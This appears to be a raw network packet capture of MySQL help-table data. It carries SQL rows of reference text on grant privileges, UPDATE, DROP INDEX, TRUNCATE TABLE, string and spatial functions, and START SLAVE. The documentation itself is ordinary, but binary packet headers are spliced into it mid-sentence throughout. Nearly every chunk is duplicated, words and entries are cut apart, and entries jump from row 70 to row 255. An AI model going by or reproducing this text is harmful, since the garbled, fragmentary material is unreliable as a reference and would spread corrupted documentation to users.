ALL ON db_name.* grant and revoke only database privileges.\n\n Table level\nTable privileges apply to all columns in a given table. These privileges are\nstored in the mysql.tables_priv table.\nGRANT ALL ON db_name.tbl_name and\nREVOKE ALL ON db_name.tbl_name grant and revoke only table privileges.\n\n Column level\nColumn privileges apply to single columns in a given table. These privileges are\nstored in the mysql.columns_priv table.\nWhen using REVOKE, you must specify the same columns that were granted.\n\n Routine level\nThe CREATE ROUTINE, ALTER ROUTINE, EXECUTE, and\nGRANT privileges apply to stored routines. They can be granted at the\nglobal and database levels. Also, except for CREATE ROUTINE, these\nprivileges can be granted at the routine level for individual routines and\nare stored in the mysql.procs_priv table.\n\n \n\nThe object_type clause was added in MySQL 5CY ZZBi0`EL@/܂Sŀo0E4Tw@? 3 PtjGk"l )?CY bb0`BiET@/Ԁo0SE<6@@  3PU = J).level\nGlobal privileges apply to all databases on a given server. These privileges\nare stored in the mysql.user table.\nGRANT ALL ON *.* and\nREVOKE ALL ON *.* grant and revoke only global privileges.\n\n Database level\nDatabase privileges apply to all objects in a given database. These privileges\nare stored in the mysql.db and mysql.host tables.\nGRANT ALL ON db_name.* and\nREVOKE ALL ON db_name.* grant and revoke only database privileges.\n\n Table level\nTable privileges apply to all columns in a given table. These privileges are\nstored in the mysql.tables_priv table.\nGRANT ALL ON db_name.tbl_name and\nREVOKE ALL ON db_name.tbl_name grant and revoke only table privileges.\n\n Column level\nColumn privileges apply to single columns in a given table. These privileges are\nstored in the mysql.columns_priv table.\nWhen using REVOKE, you must specify the same columns that were granted.\n\n Routine level\nThe CREATE ROUTINE, ALTER ROUTINE, EXECUTE, and\nGRANT privileges apply to stored routines. They can be granted at the\nglobal and database levels. Also, except for CREATE ROUTINE, these\nprivileges can be granted at the routine level for individual routines and\nare stored in the mysql.procs_priv table.\n\n \n\nThe object_type clause was added in MySQL 5CY ZZ0`BiEL@/go0AE4Tw@@ 3 PtjGk"l )?C[ ZZBi0`EL@/܂Sŀo0E4Ty@? 3 PtjLs"l )?C[ ZZ0`BiEL@/go0AE4Ty@@ 3 PtjLs"l )?C^ bbBi0`ET@/p܂Ao0E<6@?  3PZ#  K)..0.6. It should be\nspecified as TABLE, FUNCTION, or PROCEDURE when the\nfollowing object is a table, a stored function, or a stored procedure. To\nuse this clause when upgrading from a version of MySQL older than 5.0.6, you\nmust upgrade your grant tables.\nSee also : [Upgrading-grant-tables].\n','CREATE USER user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...',''),(56,'POINT',2,' Point(x,y)\nConstructs a WKB Point using its coordinates.\n','',''),(57,'CURRENT_USER',25,' CURRENT_USER()\nReturns the username and hostname combination that the current session was\nauthenticated as. This value corresponds to the MySQL account that\ndetermines your access privileges. It can be different from the value of\nUSER().\n','mysql> SELECT USER();\n -> \'davida@localhost\'\nmysql> SELECT * FROM mysql.user;\nERROR 1044: Access denied for user \'\'@\'localhost\' to\ndatabase \'mysql\'\nmysql> SELECT CURRENT_USER();\n -> \'@localhost\'',''),(58,'LCASE',23,' LCASE(str)\n\nLCASE() is a synonym for LOWER().\n','',''),(59,'<=',26,' <=\nLess than or equal:\n','mysql> SELECT 0.1 <= 2;\n -> 1',''),(60,'UPDATE',6,'The UPDATE statement updates columns in existing table rows with\nnew values. The SET clause indiC^ ZZBi0`EL@/Ao0E4=@?  PXhqb&"V d|yȌC7^ bb0`BiET@/Ԁo0SE<6@@  3PZ#  K)..0.6. It should be\nspecified as TABLE, FUNCTION, or PROCEDURE when the\nfollowing object is a table, a stored function, or a stored procedure. To\nuse this clause when upgrading from a version of MySQL older than 5.0.6, you\nmust upgrade your grant tables.\nSee also : [Upgrading-grant-tables].\n','CREATE USER user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...',''),(56,'POINT',2,' Point(x,y)\nConstructs a WKB Point using its coordinates.\n','',''),(57,'CURRENT_USER',25,' CURRENT_USER()\nReturns the username and hostname combination that the current session was\nauthenticated as. This value corresponds to the MySQL account that\ndetermines your access privileges. It can be different from the value of\nUSER().\n','mysql> SELECT USER();\n -> \'davida@localhost\'\nmysql> SELECT * FROM mysql.user;\nERROR 1044: Access denied for user \'\'@\'localhost\' to\ndatabase \'mysql\'\nmysql> SELECT CURRENT_USER();\n -> \'@localhost\'',''),(58,'LCASE',23,' LCASE(str)\n\nLCASE() is a synonym for LOWER().\n','',''),(59,'<=',26,' <=\nLess than or equal:\n','mysql> SELECT 0.1 <= 2;\n -> 1',''),(60,'UPDATE',6,'The UPDATE statement updates columns in existing table rows with\nnew values. The SET clause indiCH^ ZZ0`BiEL@/Eo0lE4=@@  PXhqb&"V d|yȌC_ ZZBi0`EL@/܂Sŀo0E4T{@? 3 PtjQ{"l  )?C*_ ZZ0`BiEL@/go0AE4T{@@ 3 PtjQ{"l  )?Cb bbBi0`ET@/p܂Ao0E<6@?  3P_+  K).cates which columns to modify\nand the values they should be given. The WHERE clause, if given,\nspecifies which rows should be updated. Otherwise, all rows are updated. If\nthe ORDER BY clause is specified, the rows are updated in the\norder that is specified. The LIMIT clause places a limit on the\nnumber of rows that can be updated.\n\nThe UPDATE statement supports the following modifiers:\n\n\n --- If you specify the LOW_PRIORITY keyword, execution of the\nUPDATE is delayed until no other clients are reading from the table.\n\n --- If you specify the IGNORE keyword, the update statement does not\nabort even if errors occur during the update. Rows for which duplicate-key\nconflicts occur are not updated. Rows for which columns are updated to\nvalues that would cause data conversion errors are updated to the closet\nvalid values instead.\n','UPDATE [LOW_PRIORITY] [IGNORE] tbl_name\n SET col_name1=expr1 [, col_name2=expr2 ...]\n [WHERE where_definition]\n [ORDER BY ...]\n [LIMIT row_count]',''),(61,'DROP INDEX',28,'DROP INDEX drops the index named index_name from the table\ntbl_name. In MySQL 3.22 or later, DROP INDEX is mapped to an\nALTER TABLE statement to drop the index. See also : [ALTER TABLE, ,\nALTER TABLE]. DROP INDEX doesn\'t do anything pCb ZZBi0`EL@/Plo0E4@?{  3P8t  [ y~).C c bb0`BiET@/Ԁo0SE<6@@  3P_+  K).cates which columns to modify\nand the values they should be given. The WHERE clause, if given,\nspecifies which rows should be updated. Otherwise, all rows are updated. If\nthe ORDER BY clause is specified, the rows are updated in the\norder that is specified. The LIMIT clause places a limit on the\nnumber of rows that can be updated.\n\nThe UPDATE statement supports the following modifiers:\n\n\n --- If you specify the LOW_PRIORITY keyword, execution of the\nUPDATE is delayed until no other clients are reading from the table.\n\n --- If you specify the IGNORE keyword, the update statement does not\nabort even if errors occur during the update. Rows for which duplicate-key\nconflicts occur are not updated. Rows for which columns are updated to\nvalues that would cause data conversion errors are updated to the closet\nvalid values instead.\n','UPDATE [LOW_PRIORITY] [IGNORE] tbl_name\n SET col_name1=expr1 [, col_name2=expr2 ...]\n [WHERE where_definition]\n [ORDER BY ...]\n [LIMIT row_count]',''),(61,'DROP INDEX',28,'DROP INDEX drops the index named index_name from the table\ntbl_name. In MySQL 3.22 or later, DROP INDEX is mapped to an\nALTER TABLE statement to drop the index. See also : [ALTER TABLE, ,\nALTER TABLE]. DROP INDEX doesn\'t do anything pCc ZZ0`BiEL@/܀o0SE4@@z  3P8t  [ y~).CZg bbBi0`ET@/p܂Ao0E<6@?  3Pd3  K).rior to MySQL\n3.22.\n','DROP INDEX index_name ON tbl_name',''),(62,'MATCH AGAINST',23,'As of MySQL 3.23.23, MySQL has support for full-text indexing\nand searching. A full-text index in MySQL is an index of type\nFULLTEXT. FULLTEXT indexes are used with MyISAM tables\nonly and can be created from CHAR, VARCHAR,\nor TEXT columns at CREATE TABLE time or added later with\nALTER TABLE or CREATE INDEX. For large datasets, it is\nmuch faster to load your data into a table that has no FULLTEXT\nindex, then create the index with ALTER TABLE (or\nCREATE INDEX). Loading data into a table that has an existing\nFULLTEXT index could be significantly slower.\n','mysql> SELECT id, body, MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\') AS score\n -> FROM articles WHERE MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\');\n+----+-------------------------------------+-----------------+\n| id | body | score |\n+----+-------------------------------------+-----------------+\n| 4 | 1. Never run mysqld as root. 2. ... | 1.5219271183014 |\n| 6 | When configured properly, MySQL ... | 1.3114095926285 |\n+----+-------------------------------------+-----------------+\n2 rCag ZZBi0`EL@/܂Sŀo0E4T}@? 3 PtjV"ly )@Cpg bb0`BiET@/Ԁo0SE<6@@  3Pd3  K).rior to MySQL\n3.22.\n','DROP INDEX index_name ON tbl_name',''),(62,'MATCH AGAINST',23,'As of MySQL 3.23.23, MySQL has support for full-text indexing\nand searching. A full-text index in MySQL is an index of type\nFULLTEXT. FULLTEXT indexes are used with MyISAM tables\nonly and can be created from CHAR, VARCHAR,\nor TEXT columns at CREATE TABLE time or added later with\nALTER TABLE or CREATE INDEX. For large datasets, it is\nmuch faster to load your data into a table that has no FULLTEXT\nindex, then create the index with ALTER TABLE (or\nCREATE INDEX). Loading data into a table that has an existing\nFULLTEXT index could be significantly slower.\n','mysql> SELECT id, body, MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\') AS score\n -> FROM articles WHERE MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\');\n+----+-------------------------------------+-----------------+\n| id | body | score |\n+----+-------------------------------------+-----------------+\n| 4 | 1. Never run mysqld as root. 2. ... | 1.5219271183014 |\n| 6 | When configured properly, MySQL ... | 1.3114095926285 |\n+----+-------------------------------------+-----------------+\n2 rC{g ZZ0`BiEL@/go0AE4T}@@ 3 PtjV"ly )@CTh ZZBi0`EL@/Ao0E4= @?  PXhql(J< dy̌Ceh ZZ0`BiEL@/Eo0lE4= @@  PXhql(J< dy̌CAk bbBi0`ET@/p܂Ao0E<6@?  3Pi; a K)/ows in set (0.00 sec)',''),(63,'ABS',4,' ABS(X)\nReturns the absolute value of X.\n','mysql> SELECT ABS(2);\n -> 2\nmysql> SELECT ABS(-32);\n -> 32',''),(64,'POLYFROMWKB',13,' PolyFromWKB(wkb[,srid])\n PolygonFromWKB(wkb[,srid])\nConstructs a POLYGON value using its WKB representation and SRID.\n','',''),(65,'NOT LIKE',23,' expr NOT LIKE pat [ESCAPE \'escape-char\']\n\nThis is the same as NOT (expr LIKE pat [ESCAPE \'escape-char\']).\n','',''),(66,'SPACE',23,' SPACE(N)\nReturns a string consisting of N space characters.\n','mysql> SELECT SPACE(6);\n -> \' \'',''),(67,'MBR DEFINITION',8,'Every geometry occupies some position in space. The exterior of\na geometry is all space not occupied by the geometry. The interior\nis the space occupied by the geometry. The boundary is the\ninterface between the geometry\'s interior and exterior.\n\n --- Its MBR (Minimum Bounding Rectangle), or Envelope.\nThis is the bounding geometry, formed by the minimum and maximum (X,Y)\ncoordinates:\n','((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))',''),(68,'GEOMETRYCOLLECTION',2,' GeometryCollection(g1,g2,...)\nConstructs a WKB GeometryCollection. If any argument is not a\nwell-formed WKB representation of a geometry, the return value is\nNULLCHk ffBi0`EX@/Ao0E@= @?  PXhql(  dy rt CXk bb0`BiET@/Ԁo0SE<6@@  3Pi; a K)/ows in set (0.00 sec)',''),(63,'ABS',4,' ABS(X)\nReturns the absolute value of X.\n','mysql> SELECT ABS(2);\n -> 2\nmysql> SELECT ABS(-32);\n -> 32',''),(64,'POLYFROMWKB',13,' PolyFromWKB(wkb[,srid])\n PolygonFromWKB(wkb[,srid])\nConstructs a POLYGON value using its WKB representation and SRID.\n','',''),(65,'NOT LIKE',23,' expr NOT LIKE pat [ESCAPE \'escape-char\']\n\nThis is the same as NOT (expr LIKE pat [ESCAPE \'escape-char\']).\n','',''),(66,'SPACE',23,' SPACE(N)\nReturns a string consisting of N space characters.\n','mysql> SELECT SPACE(6);\n -> \' \'',''),(67,'MBR DEFINITION',8,'Every geometry occupies some position in space. The exterior of\na geometry is all space not occupied by the geometry. The interior\nis the space occupied by the geometry. The boundary is the\ninterface between the geometry\'s interior and exterior.\n\n --- Its MBR (Minimum Bounding Rectangle), or Envelope.\nThis is the bounding geometry, formed by the minimum and maximum (X,Y)\ncoordinates:\n','((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))',''),(68,'GEOMETRYCOLLECTION',2,' GeometryCollection(g1,g2,...)\nConstructs a WKB GeometryCollection. If any argument is not a\nwell-formed WKB representation of a geometry, the return value is\nNULLCck ff0`BiEX@/Eo0lE@= @@  PXhql(  dy rt Cl ZZBi0`EL@/܂Sŀo0E4@@?? 3 P8't )@Cl ZZ0`BiEL@/go0AE4@@@? 3 P8't )@Co bbBi0`ET@/p܂Ao0E<6@?  3PnC F K)/.\n','',''),(69,'*',4,' *\nMultiplication:\n','mysql> SELECT 3*5;\n -> 15\nmysql> SELECT 18014398509481984*18014398509481984.0;\n -> 324518553658426726783156020576256.0\nmysql> SELECT 18014398509481984*18014398509481984;\n -> 0',''),(70,'TIMESTAMP',1,' TIMESTAMP[(M)]\n\nA timestamp. The range is \'1970-01-01 00:00:00\' to partway through the\nyear 2037.\n\nA TIMESTAMP column is useful for recording the date and time of an\nINSERT or UPDATE operation. The first TIMESTAMP column\nin a table is automatically set to the date and time of the most recent\noperation if you don\'t assign it a value yourself. You can also set any\nTIMESTAMP column to the current date and time by assigning it a\nNULL value.\n\nFrom MySQL 4.1 on, TIMESTAMP is returned as a string with the format\n\'YYYY-MM-DD HH:MM:SS\'. If you want to obtain the value as a number,\nyou should add +0 to the timestamp column. Different timestamp\ndisplay widths are not supported.\n\nIn MySQL 4.0 and earlier, TIMESTAMP values are displayed in\nYYYYMMDDHHMMSS, YYMMDDHHMMSS, YYYYMMDD, or YYMMDD\nformat, depending on whether M is 14 (or missing), 12,\n8, or 6, but allows you to assign values to TIMESTAMP\ncolumns using either strings or numbers.\nThe M argument affects only how a TIMESTAMP Co ZZBi0`EL@/Ao0E4= @?  PXhqt +*@ dy̌Co bb0`BiET@/Ԁo0SE<6@@  3PnC F K)/.\n','',''),(69,'*',4,' *\nMultiplication:\n','mysql> SELECT 3*5;\n -> 15\nmysql> SELECT 18014398509481984*18014398509481984.0;\n -> 324518553658426726783156020576256.0\nmysql> SELECT 18014398509481984*18014398509481984;\n -> 0',''),(70,'TIMESTAMP',1,' TIMESTAMP[(M)]\n\nA timestamp. The range is \'1970-01-01 00:00:00\' to partway through the\nyear 2037.\n\nA TIMESTAMP column is useful for recording the date and time of an\nINSERT or UPDATE operation. The first TIMESTAMP column\nin a table is automatically set to the date and time of the most recent\noperation if you don\'t assign it a value yourself. You can also set any\nTIMESTAMP column to the current date and time by assigning it a\nNULL value.\n\nFrom MySQL 4.1 on, TIMESTAMP is returned as a string with the format\n\'YYYY-MM-DD HH:MM:SS\'. If you want to obtain the value as a number,\nyou should add +0 to the timestamp column. Different timestamp\ndisplay widths are not supported.\n\nIn MySQL 4.0 and earlier, TIMESTAMP values are displayed in\nYYYYMMDDHHMMSS, YYMMDDHHMMSS, YYYYMMDD, or YYMMDD\nformat, depending on whether M is 14 (or missing), 12,\n8, or 6, but allows you to assign values to TIMESTAMP\ncolumns using either strings or numbers.\nThe M argument affects only how a TIMESTAMP Co ZZ0`BiEL@/Eo0lE4= @@  PXhqt +*@ dy̌Ct bbBi0`ET@/p܂Ao0E<@?L\  3PWtڀ Z S)1n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. Starting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-created as an empty table with TRUNCATE\nTABLE, even if the data or index files have become corrupted.\n --- The table handler does not remember the last used AUTO_INCREMENT\nvalue, but starts counting from the beginning. This is true even for\nMyISAM and InnoDB, which normally does not reuse sequence values.\n\nIn MySQL 3.23, TRUNCATE TABLE is mapped to\nCOMMIT; DELETE FROM tbl_name, so it behaves like DELETE.\nSee also : [DELETE, , DELETE].\n\nTRUNCATE TABLE is an Oracle SQL extension.\nThis statement was addCt ZZBi0`EL@/܂Sŀo0E4B@?= 3 PB΀'t )ACt bb0`BiET@/Ԁo0SE<@@K\  3PWtڀ Z S)1n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. Starting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-created as an empty table with TRUNCATE\nTABLE, even if the data or index files have become corrupted.\n --- The table handler does not remember the last used AUTO_INCREMENT\nvalue, but starts counting from the beginning. This is true even for\nMyISAM and InnoDB, which normally does not reuse sequence values.\n\nIn MySQL 3.23, TRUNCATE TABLE is mapped to\nCOMMIT; DELETE FROM tbl_name, so it behaves like DELETE.\nSee also : [DELETE, , DELETE].\n\nTRUNCATE TABLE is an Oracle SQL extension.\nThis statement was addCt ZZ0`BiEL@/go0AE4B@@= 3 PB΀'t )ACu ZZBi0`EL@/"  o0E4@?+m  3PZtП a _) Cu ZZ0`BiEL@/܀o0SE4@@*m  3PZtП a _) Chy bbBi0`ET@/p܂Ao0E<@?L[  3PWtڀ  S)1ed in MySQL 3.23.28, although from 3.23.28\nto 3.23.32, the keyword TABLE must be omitted.\n','TRUNCATE TABLE tbl_name',''),(255,'CURRENT_DATE',14,' CURRENT_DATE\n CURRENT_DATE()\n\nCURRENT_DATE and CURRENT_DATE() are synonyms for\nCURDATE().\n','',''),(256,'BIT_XOR',12,' BIT_XOR(expr)\nReturns the bitwise XOR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(257,'AREA',0,' Area(poly)\nReturns as a double-precision number the area of the Polygon value\npoly, as measured in its spatial reference system.\n','mysql> SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+',''),(258,'START SLAVE',7,'START SLAVE [thread_type [, thread_type] ... ]\nSTART SLAVE [SQL_THREAD] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no options starts both of the slave threads.\nThe I/O thread reads queries from the master server and stores them in the\nrelay log. The SC{y bb0`BiET@/Ԁo0SE<@@K[  3PWtڀ  S)1ed in MySQL 3.23.28, although from 3.23.28\nto 3.23.32, the keyword TABLE must be omitted.\n','TRUNCATE TABLE tbl_name',''),(255,'CURRENT_DATE',14,' CURRENT_DATE\n CURRENT_DATE()\n\nCURRENT_DATE and CURRENT_DATE() are synonyms for\nCURDATE().\n','',''),(256,'BIT_XOR',12,' BIT_XOR(expr)\nReturns the bitwise XOR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(257,'AREA',0,' Area(poly)\nReturns as a double-precision number the area of the Polygon value\npoly, as measured in its spatial reference system.\n','mysql> SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+',''),(258,'START SLAVE',7,'START SLAVE [thread_type [, thread_type] ... ]\nSTART SLAVE [SQL_THREAD] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no options starts both of the slave threads.\nThe I/O thread reads queries from the master server and stores them in the\nrelay log. The SCbz ZZBi0`EL@/"  o0E4q@?  3PZ.'q  _) Csz ZZ0`BiEL@/܀o0SE4q@@  3PZ.'q  _) C} bbBi0`ET@/p܂Ao0E<@?LZ  3PWtڀ  W)2QL thread reads the relay log and executes the\nqueries.\nSTART SLAVE requires the SUPER privilege.\n\nIf START SLAVE succeeds in starting the slave threads, it\nreturns without any error. However, even in that case, it might be that the slave\nthreads start and then later stop (for example, because they don\'t manage to\nconnect to the master or read its binary logs, or some other\nproblem). START SLAVE does not warn you about this. You must\ncheck your slave\'s error log for error messages generated by\nthe slave threads, or check that they are running fine with SHOW\nSLAVE STATUS.\n','',''),(259,'FLUSH',6,'You should use the FLUSH statement if you want to clear some of the\ninternal caches MySQL uses. To execute FLUSH, you must have\nthe RELOAD privilege.\n','FLUSH [LOCAL | NO_WRITE_TO_BINLOG] flush_option [, flush_option] ...',''),(260,'DESCRIBE',7,'{DESCRIBE | DESC} tbl_name [col_name | wild]\n\nDESCRIBE provides information about the columns in a table. It is a\nshortcut for SHOW COLUMNS FROM. As of MySQL 5.0.1, these statements\nalso display information for views.\n','',''),(261,'STDDEV_POP',12,' STDDEV_POP(expr)\nReturns the population standard deviation of expr (the square root of\nVAR_POP()). This function was added in MySQL 5.0.3. Before 5.0.3,\nyou cC} bb0`BiET@/Ԁo0SE<@@KZ  3PWtڀ  W)2QL thread reads the relay log and executes the\nqueries.\nSTART SLAVE requires the SUPER privilege.\n\nIf START SLAVE succeeds in starting the slave threads, it\nreturns without any error. However, even in that case, it might be that the slave\nthreads start and then later stop (for example, because they don\'t manage to\nconnect to the master or read its binary logs, or some other\nproblem). START SLAVE does not warn you about this. You must\ncheck your slave\'s error log for error messages generated by\nthe slave threads, or check that they are running fine with SHOW\nSLAVE STATUS.\n','',''),(259,'FLUSH',6,'You should use the FLUSH statement if you want to clear some of the\ninternal caches MySQL uses. To execute FLUSH, you must have\nthe RELOAD privilege.\n','FLUSH [LOCAL | NO_WRITE_TO_BINLOG] flush_option [, flush_option] ...',''),(260,'DESCRIBE',7,'{DESCRIBE | DESC} tbl_name [col_name | wild]\n\nDESCRIBE provides information about the columns in a table. It is a\nshortcut for SHOW COLUMNS FROM. As of MySQL 5.0.1, these statements\nalso display information for views.\n','',''),(261,'STDDEV_POP',12,' STDDEV_POP(expr)\nReturns the population standard deviation of expr (the square root of\nVAR_POP()). This function was added in MySQL 5.0.3. Before 5.0.3,\nyou cC bbBi0`ET@/p܂Ao0E<@?LY  3PWtڀ  W)2an use STD() or STDDEV(), which are equivalent but not\nstandard SQL.\n','',''),(262,'SUBSTRING',23,' SUBSTRING(str,pos)\n SUBSTRING(str FROM pos)\n SUBSTRING(str,pos,len)\n SUBSTRING(str FROM pos FOR len)\n\nThe forms without a len argument\nreturn a substring from string str starting at position pos.\nThe forms with a len argument\nreturn a substring len characters long from string str,\nstarting at position pos.\nThe forms that use FROM are standard SQL syntax.\n','mysql> SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'',''),(263,'ISEMPTY',19,' IsEmpty(g)\nReturns 1 if the geometry value g is the empty geometry, 0 if it is not\nempty, and -1 if the argument is NULL.\nIf the geometry is empty, it represents the empty point set.\n','',''),(264,'LTRIM',23,' LTRIM(str)\nReturns the string str with leading space characters removed.\n','mysql> SELECT LTRIM(\' barbar\');\n -> \'barbar\'',''),(265,'REPAIR',7,'REPAIR TABLE repairs a possibly corrupted table.\nBy default,\nit has the same effect as myisamchk --recover tbl_name.\nREPAIR TABLE works only on MyISAM tables.\n','REPAIR [LOCAL | NO_WRITE_C bb0`BiET@/Ԁo0SE<@@KY  3PWtڀ  W)2an use STD() or STDDEV(), which are equivalent but not\nstandard SQL.\n','',''),(262,'SUBSTRING',23,' SUBSTRING(str,pos)\n SUBSTRING(str FROM pos)\n SUBSTRING(str,pos,len)\n SUBSTRING(str FROM pos FOR len)\n\nThe forms without a len argument\nreturn a substring from string str starting at position pos.\nThe forms with a len argument\nreturn a substring len characters long from string str,\nstarting at position pos.\nThe forms that use FROM are standard SQL syntax.\n','mysql> SELECT SUBSTRING(\'Quadratically\',5);\n -> \'ratically\'\nmysql> SELECT SUBSTRING(\'foobarbar\' FROM 4);\n -> \'barbar\'\nmysql> SELECT SUBSTRING(\'Quadratically\',5,6);\n -> \'ratica\'',''),(263,'ISEMPTY',19,' IsEmpty(g)\nReturns 1 if the geometry value g is the empty geometry, 0 if it is not\nempty, and -1 if the argument is NULL.\nIf the geometry is empty, it represents the empty point set.\n','',''),(264,'LTRIM',23,' LTRIM(str)\nReturns the string str with leading space characters removed.\n','mysql> SELECT LTRIM(\' barbar\');\n -> \'barbar\'',''),(265,'REPAIR',7,'REPAIR TABLE repairs a possibly corrupted table.\nBy default,\nit has the same effect as myisamchk --recover tbl_name.\nREPAIR TABLE works only on MyISAM tables.\n','REPAIR [LOCAL | NO_WRITE_C bbBi0`ET@/p܂Ao0E<@?LX  3PWtڀ  X)3TO_BINLOG] TABLE\n tbl_name [, tbl_name] ... [QUICK] [EXTENDED] [USE_FRM]',''),(266,'INTERSECTS',11,' Intersects(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially intersects\ng2.\n','',''),(267,'MBRDISJOINT',8,' MBRDisjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 are disjoint (do not intersect).\n','',''),(268,'SUBSTRING_INDEX',23,' SUBSTRING_INDEX(str,delim,count)\nReturns the substring from string str before count\noccurrences of the delimiter delim.\nIf count is positive, everything to the left of the final delimiter\n(counting from the left) is returned.\nIf count is negative, everything to the right of the final delimiter\n(counting from the right) is returned.\n','mysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n -> \'mysql.com\'',''),(269,'ENCODE',17,' ENCODE(str,pass_str)\nEncrypt str using pass_str as the password.\nTo decrypt the result, use DECODE().\n\nThe result is a binary string of the same length as str.\nIf you want to save it in a column, use a BLOB column type.\n','',''),(270,'TRUNCATE',4,' TRUNCATE(X,D)\nReturns the number X, truncated to D decC$ bb0`BiET@/Ԁo0SE<@@KX  3PWtڀ  X)3TO_BINLOG] TABLE\n tbl_name [, tbl_name] ... [QUICK] [EXTENDED] [USE_FRM]',''),(266,'INTERSECTS',11,' Intersects(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially intersects\ng2.\n','',''),(267,'MBRDISJOINT',8,' MBRDisjoint(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 are disjoint (do not intersect).\n','',''),(268,'SUBSTRING_INDEX',23,' SUBSTRING_INDEX(str,delim,count)\nReturns the substring from string str before count\noccurrences of the delimiter delim.\nIf count is positive, everything to the left of the final delimiter\n(counting from the left) is returned.\nIf count is negative, everything to the right of the final delimiter\n(counting from the right) is returned.\n','mysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', 2);\n -> \'www.mysql\'\nmysql> SELECT SUBSTRING_INDEX(\'www.mysql.com\', \'.\', -2);\n -> \'mysql.com\'',''),(269,'ENCODE',17,' ENCODE(str,pass_str)\nEncrypt str using pass_str as the password.\nTo decrypt the result, use DECODE().\n\nThe result is a binary string of the same length as str.\nIf you want to save it in a column, use a BLOB column type.\n','',''),(270,'TRUNCATE',4,' TRUNCATE(X,D)\nReturns the number X, truncated to D decC ZZBi0`EL@/܂Sŀo0E4D@?; 3 PLހ'tt )BC ZZ0`BiEL@/go0AE4D@@; 3 PLހ'tt )BC bbBi0`ET@/p܂Ao0E< @?LW  3PWɟtڀ f X)3imals. If D\nis 0, the result has no decimal point or fractional part.\nD can be negative to truncate (make zero) D digits left of the\ndecimal point of the value X.\n','mysql> SELECT TRUNCATE(1.223,1);\n -> 1.2\nmysql> SELECT TRUNCATE(1.999,1);\n -> 1.9\nmysql> SELECT TRUNCATE(1.999,0);\n -> 1\nmysql> SELECT TRUNCATE(-1.999,1);\n -> -1.9\nmysql> SELECT TRUNCATE(122,-2);\n -> 100',''),(271,'TIMESTAMPADD',14,' TIMESTAMPADD(interval,int_expr,datetime_expr)\n\nAdds the integer expression int_expr to the date or datetime expression\ndatetime_expr. The unit for int_expr is given by the\ninterval argument, which should be one of the following values:\nFRAC_SECOND,\nSECOND,\nMINUTE,\nHOUR,\nDAY,\nWEEK,\nMONTH,\nQUARTER,\nor\nYEAR.\n\nThe interval value may be specified using one of keywords as shown,\nor with a prefix of SQL_TSI_. For example, DAY or\nSQL_TSI_DAY both are legal.\n','',''),(272,'SHOW',6,'\nSHOW has many forms that provide information about databases,\ntables, columns, or status information about the server.\nThis section describes those following:\n\nSHOW [FULL] COLUMNS FROM tbl_name [FROM db_name] [LIKE \'pattern\']\nSHOW CREATE DATABASE db_name\nSHOW CREATE TABLE tbl_name\nSHOW DATABASES [LIKE \'pattern\']\nSHOW ENGINE eC 